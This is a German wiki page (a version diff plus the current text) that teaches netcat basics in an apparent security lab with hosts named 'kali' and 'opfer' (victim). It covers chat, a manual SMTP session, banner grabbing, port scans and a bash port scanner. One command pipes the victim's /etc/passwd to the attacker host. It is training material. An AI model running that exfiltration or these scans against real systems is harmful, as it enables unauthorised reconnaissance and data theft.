Netcat Basics: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| (18 dazwischenliegende Versionen desselben Benutzers werden nicht angezeigt) | |||
| Zeile 1: | Zeile 1: | ||
| + | =Listen= | ||
=Chat= | =Chat= | ||
| − | ;auf | + | ;auf kali |
*nc -l -p 6789 | *nc -l -p 6789 | ||
| − | ;auf | + | ;auf kali |
| − | *nc | + | *ss -lntp | grep 6789 |
| + | |||
| + | |||
| + | =Chat= | ||
| + | ;local | ||
| + | ;auf kali | ||
| + | *nc -l -p 6789 | ||
| + | ;auf kali | ||
| + | *nc kali 6789 | ||
| + | ;Net | ||
| + | ;auf kali | ||
| + | *nc -l -p 6789 | ||
| + | ;auf opfer | ||
| + | *nc kali 6789 | ||
| + | |||
=Filetransfer= | =Filetransfer= | ||
| − | ;auf | + | ;auf kali |
*nc -l -p 6789 > /tmp/passwd | *nc -l -p 6789 > /tmp/passwd | ||
| − | ;auf | + | ;auf opfer |
| − | *cat /etc/passwd | nc | + | *cat /etc/passwd | nc kali 6789 |
| + | |||
=Connect a Mailserver= | =Connect a Mailserver= | ||
;auf yun | ;auf yun | ||
| − | *nc | + | *nc mail.tcpdump.de 25 |
220 red ESMTP Postfix (Ubuntu) | 220 red ESMTP Postfix (Ubuntu) | ||
| + | |||
| + | '''ehlo kit.de''' | ||
| + | 250-mail.tcpdump.de | ||
| + | 250-PIPELINING | ||
| + | 250-SIZE 10240000 | ||
| + | 250-VRFY | ||
| + | 250-ETRN | ||
| + | 250-STARTTLS | ||
| + | 250-AUTH PLAIN | ||
| + | 250-ENHANCEDSTATUSCODES | ||
| + | 250-8BITMIME | ||
| + | 250-DSN | ||
| + | 250-SMTPUTF8 | ||
| + | 250 CHUNKING | ||
| + | '''mail from: kit13@kit.de''' | ||
| + | 250 2.1.0 Ok | ||
| + | '''rcpt to: thomas@xinux.de''' | ||
| + | 250 2.1.5 Ok | ||
| + | '''data''' | ||
| + | 354 End data with <CR><LF>.<CR><LF> | ||
| + | '''Subject: testmail vom kit''' | ||
| + | |||
| + | '''Hallo Thomas Gruss vom Kit''' | ||
| + | |||
| + | '''.''' | ||
| + | 250 2.0.0 Ok: queued as A66DE260542 | ||
| + | '''quit''' | ||
| + | 221 2.0.0 Bye | ||
| + | =Dem Server Informationen entlocken (Bannergrabbing)= | ||
| + | ;Webserver | ||
| + | *echo -e "GET / HTTP/1.1\n\n" | nc opfer 80 | grep "^Server" | ||
| + | Server: Apache/2.4.29 (Ubuntu) | ||
| + | ;SSH | ||
| + | *echo -e "\n" | nc opfer 22 | grep SSH | ||
| + | SSH-2.0-OpenSSH_7.6p1 Ubuntu-4 | ||
| + | *echo -e "SSH-2.0-OpenSSH_7.6p1\n\n" | nc opfer 22 | ||
| + | <pre> | ||
| + | SSH-2.0-OpenSSH_7.6p1 Ubuntu-4 | ||
| + | 4�V΅�k�`!e��?-curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1Assh-rsa,rsa-sha2-512,rsa-sha2-256,ecdsa-sha2-nistp256,ssh-ed25519lchacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.comlchacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com�umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1�umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1none,zlib@openssh.comnone,zlib@openssh.com | ||
| + | </pre> | ||
| + | |||
=Scan= | =Scan= | ||
| − | ;auf | + | ;auf kali |
| − | *netcat -w -1 -z | + | *netcat -w 1 -z opfer 9999 ; echo $? |
| + | 0 | ||
| + | ;erfolgreich | ||
| + | *netcat -w 1 -z opfer 9999 ; echo $? | ||
| + | 1 | ||
| + | ;nicht erfolgreich | ||
| + | |||
| + | =Eigener Scanner= | ||
| + | * cat scan | ||
| + | <pre> | ||
| + | #!/bin/bash | ||
| + | HOST=$1 | ||
| + | START=$2 | ||
| + | STOP=$3 | ||
| + | for ((i=$START;i<=$STOP;i++)) | ||
| + | do | ||
| + | if netcat -w 1 -z $HOST $i | ||
| + | then | ||
| + | echo "$HOST $i open" | ||
| + | fi | ||
| + | done | ||
| + | </pre> | ||
| + | |||
| + | |||
| + | =Scan von Port 22 bis Port 80= | ||
| + | *nc -z -v opfer 22-80 | ||
| + | Warning: inverse host lookup failed for 10.0.10.104: Unknown host | ||
| + | opfer.sec-labs.de [10.0.10.104] 80 (http) open | ||
| + | opfer.sec-labs.de [10.0.10.104] 25 (smtp) open | ||
| + | opfer.sec-labs.de [10.0.10.104] 22 (ssh) open | ||
Aktuelle Version vom 3. Februar 2026, 11:17 Uhr
Listen
Chat
- auf kali
- nc -l -p 6789
- auf kali
- ss -lntp | grep 6789
Chat
- local
- auf kali
- nc -l -p 6789
- auf kali
- nc kali 6789
- Net
- auf kali
- nc -l -p 6789
- auf opfer
- nc kali 6789
Filetransfer
- auf kali
- nc -l -p 6789 > /tmp/passwd
- auf opfer
- cat /etc/passwd | nc kali 6789
Connect a Mailserver
- auf yun
- nc mail.tcpdump.de 25
220 red ESMTP Postfix (Ubuntu)
ehlo kit.de 250-mail.tcpdump.de 250-PIPELINING 250-SIZE 10240000 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250-SMTPUTF8 250 CHUNKING mail from: kit13@kit.de 250 2.1.0 Ok rcpt to: thomas@xinux.de 250 2.1.5 Ok data 354 End data with <CR><LF>.<CR><LF> Subject: testmail vom kit Hallo Thomas Gruss vom Kit . 250 2.0.0 Ok: queued as A66DE260542 quit 221 2.0.0 Bye
Dem Server Informationen entlocken (Bannergrabbing)
- Webserver
- echo -e "GET / HTTP/1.1\n\n" | nc opfer 80 | grep "^Server"
Server: Apache/2.4.29 (Ubuntu)
- SSH
- echo -e "\n" | nc opfer 22 | grep SSH
SSH-2.0-OpenSSH_7.6p1 Ubuntu-4
- echo -e "SSH-2.0-OpenSSH_7.6p1\n\n" | nc opfer 22
SSH-2.0-OpenSSH_7.6p1 Ubuntu-4 4�V΅�k�`!e��?-curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1Assh-rsa,rsa-sha2-512,rsa-sha2-256,ecdsa-sha2-nistp256,ssh-ed25519lchacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.comlchacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com�umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1�umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1none,zlib@openssh.comnone,zlib@openssh.com
Scan
- auf kali
- netcat -w 1 -z opfer 9999 ; echo $?
0
- erfolgreich
- netcat -w 1 -z opfer 9999 ; echo $?
1
- nicht erfolgreich
Eigener Scanner
- cat scan
#!/bin/bash
HOST=$1
START=$2
STOP=$3
for ((i=$START;i<=$STOP;i++))
do
if netcat -w 1 -z $HOST $i
then
echo "$HOST $i open"
fi
done
Scan von Port 22 bis Port 80
- nc -z -v opfer 22-80
Warning: inverse host lookup failed for 10.0.10.104: Unknown host opfer.sec-labs.de [10.0.10.104] 80 (http) open opfer.sec-labs.de [10.0.10.104] 25 (smtp) open opfer.sec-labs.de [10.0.10.104] 22 (ssh) open